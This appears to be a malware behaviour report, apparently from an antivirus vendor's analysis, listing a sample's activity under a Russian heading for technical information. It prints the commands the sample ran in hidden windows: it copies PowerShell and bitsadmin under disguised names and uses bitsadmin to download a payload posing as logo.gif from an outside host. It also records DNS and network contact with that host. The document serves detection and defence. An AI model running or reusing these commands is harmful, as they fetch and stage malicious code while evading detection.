Техническая информация
- '%ALLUSERSPROFILE%\nqlingwin.exe' /transfer VNLyyp /download https://estebankott.com/ordasum/BLTGLR49P02A163N/logo.gif %APPDATA%\logo.gif
- %ALLUSERSPROFILE%\zezgcnot.exe
- %ALLUSERSPROFILE%\nqlingwin.exe
- 'es###ankott.com':443
- DNS ASK es###ankott.com
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zeZGcnoT.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\nqliNgw*.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\nqlingwin.exe' /transfer VNLyyp /download https://estebankott.com/ordasum/BLTGLR49P02A163N/logo.gif %APPDATA%\logo.gif' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zeZGcnoT.exe & cmd /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\nqliNgw*.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zeZGcnoT.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\nqliNgw*.exe